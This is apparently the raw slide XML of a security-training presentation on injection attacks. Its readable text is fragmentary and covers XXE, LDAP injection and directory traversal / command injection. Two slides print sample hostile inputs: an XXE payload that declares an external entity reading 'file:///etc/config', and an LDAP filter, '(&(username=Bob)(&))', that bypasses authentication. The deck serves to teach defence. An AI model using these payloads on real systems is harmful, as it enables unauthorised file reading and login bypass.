            <a:chOff x="5224271" y="5087111"/>
            <a:chExt cx="6179820" cy="303593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79135" y="5087111"/>
              <a:ext cx="6124956" cy="30190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24271" y="5335511"/>
              <a:ext cx="5905500" cy="278739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30951" y="5137403"/>
              <a:ext cx="6000115" cy="2895600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6000115" h="2895600">
                  <a:moveTo>
                    <a:pt x="5999988" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2895600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5999988" y="2895600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5999988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330951" y="5137403"/>
              <a:ext cx="6000115" cy="2895600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6000115" h="2895600">
                  <a:moveTo>
                    <a:pt x="0" y="2895600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5999988" y="2895600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5999988" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2895600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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410961" y="5415533"/>
            <a:ext cx="5358765" cy="24707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 spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" encoding="&lt;?xml </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1190">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>version="1.0"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>encoding="UTF-8"?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2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2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[&lt;!ELEMENT foo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ANY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2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;!ENTITY</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bar</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SYSTEM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2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"file:///etc/config"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;bar&gt;&amp;bar;&lt;/bar&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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273040" y="4898174"/>
            <a:ext cx="6139180" cy="3276600"/>
            <a:chOff x="5273040" y="4898174"/>
            <a:chExt cx="6139180" cy="327660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73040" y="4898174"/>
              <a:ext cx="6138671" cy="43734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318760" y="4943856"/>
              <a:ext cx="6024880" cy="323215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6024880" h="323214">
                  <a:moveTo>
                    <a:pt x="5935725" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="323088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6024371" y="323088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6024371" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6017396" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5998384" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5970204" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5935725" y="0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73040" y="7987284"/>
              <a:ext cx="6138671" cy="18745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318760" y="8033004"/>
              <a:ext cx="6024880" cy="73660"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6024880" h="73659">
                  <a:moveTo>
                    <a:pt x="6024372" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6024372" y="73152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6024372" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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3982211" y="2763011"/>
            <a:ext cx="4145279" cy="1104900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4145279" h="1104900">
                <a:moveTo>
                  <a:pt x="3961130" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="184150" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135187" y="6576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91195" y="25136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53927" y="53927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25136" y="91195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6576" y="135187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="920750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6576" y="969712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25136" y="1013704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53927" y="1050972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91195" y="1079763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135187" y="1098323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184150" y="1104900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3961130" y="1104900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4010092" y="1098323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4054084" y="1079763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4091352" y="1050972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4120143" y="1013704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4138703" y="969712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4145280" y="920750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4145280" y="184150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4138703" y="135187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4120143" y="91195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4091352" y="53927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4054084" y="25136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4010092" y="6576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3961130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4515103" y="3119754"/>
            <a:ext cx="307975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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>XM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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7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18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documents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331707" y="2763011"/>
            <a:ext cx="4203700" cy="1104900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4203700" h="1104900">
                <a:moveTo>
                  <a:pt x="4019042" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="184150" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135187" y="6576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91195" y="25136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53927" y="53927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25136" y="91195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6576" y="135187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="920750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6576" y="969712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25136" y="1013704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53927" y="1050972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91195" y="1079763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135187" y="1098323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184150" y="1104900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4019042" y="1104900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4068004" y="1098323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111996" y="1079763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149264" y="1050972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178055" y="1013704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196615" y="969712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203192" y="920750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203192" y="184150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196615" y="135187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178055" y="91195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149264" y="53927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4111996" y="25136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4068004" y="6576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4019042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8636000" y="2881123"/>
            <a:ext cx="3592829" cy="79057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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>XM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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90">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ex</a:t>
            </a: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nal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Entit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90">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(X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X</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>)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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>exfi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-7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3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3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15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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an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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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es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76752" y="4208779"/>
            <a:ext cx="1087056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Example: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XML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External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Entity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(XXE)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attack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embeds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request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local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resource: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83200" y="306451"/>
            <a:ext cx="568833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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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5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dirty="0" spc="-7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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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56713" y="1933193"/>
            <a:ext cx="1169797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Lightweight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Directory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Access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Protocol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(LDAP)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another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example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query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language.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2440" y="760476"/>
            <a:ext cx="7776971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483352" y="6327698"/>
            <a:ext cx="5396865" cy="1755775"/>
            <a:chOff x="5483352" y="6327698"/>
            <a:chExt cx="5396865" cy="175577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89448" y="6423647"/>
              <a:ext cx="5384292" cy="162610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541264" y="6473951"/>
              <a:ext cx="5259705" cy="1503045"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5259705" h="1503045">
                  <a:moveTo>
                    <a:pt x="5259324" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1502664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5259324" y="1502664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5259324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541264" y="6473951"/>
              <a:ext cx="5259705" cy="1503045"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5259705" h="1503045">
                  <a:moveTo>
                    <a:pt x="0" y="1502664"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5259324" y="1502664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5259324" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1502664"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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83352" y="6327698"/>
              <a:ext cx="5396484" cy="28188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529072" y="6373367"/>
              <a:ext cx="5282565" cy="167640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5282565" h="167640">
                  <a:moveTo>
                    <a:pt x="5236209" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45974" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28074" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13462" y="13461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="28074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="45973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282183" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282183" y="45973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5278572" y="28074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5268721" y="13461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5254109" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5236209" y="0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83352" y="7930895"/>
              <a:ext cx="5396484" cy="1523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529072" y="7976615"/>
              <a:ext cx="5282565" cy="38100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5282565" h="38100">
                  <a:moveTo>
                    <a:pt x="5282183" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="38099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282183" y="38099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282183" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3096767" y="2868167"/>
            <a:ext cx="10347960" cy="745490"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10347960" h="745489">
                <a:moveTo>
                  <a:pt x="10223753" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="124206" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75866" y="9763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36385" y="36385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763" y="75866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="621030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9763" y="669369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36385" y="708850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75866" y="735472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124206" y="745236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223753" y="745236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10272093" y="735472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10311574" y="708850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10338196" y="669369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10347960" y="621030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10347960" y="124206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10338196" y="75866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10311574" y="36385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10272093" y="9763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223753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096767" y="3957828"/>
            <a:ext cx="10347960" cy="942340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10347960" h="942339">
                <a:moveTo>
                  <a:pt x="10190988" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="156971" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107338" y="7997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64245" y="30272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30272" y="64245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7997" y="107338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="784860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7997" y="834493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30272" y="877586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64245" y="911559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107338" y="933834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156971" y="941832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10190988" y="941832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10240621" y="933834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10283714" y="911559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10317687" y="877586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10339962" y="834493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10347960" y="784860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10347960" y="156972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10339962" y="107338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10317687" y="64245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10283714" y="30272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10240621" y="7997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10190988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470275" y="3044698"/>
            <a:ext cx="9599930" cy="17411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It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5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an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up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3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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>netw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6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85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direct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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ries.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335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submit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>LDAP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queries,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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threat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actor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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>exploits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unauthenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>access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endParaRPr sz="2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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>client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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>app.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33470" y="5550154"/>
            <a:ext cx="11205210" cy="18307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Example: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If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web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forms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authenticate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LDAP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directory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with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valid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credentials,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constructs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query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from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user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input.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4050">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3353435">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(&amp;(username=Bob)(&amp;))</a:t>
            </a:r>
            <a:endParaRPr sz="2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22726" y="306451"/>
            <a:ext cx="920686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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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5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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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70">
                <a:solidFill>
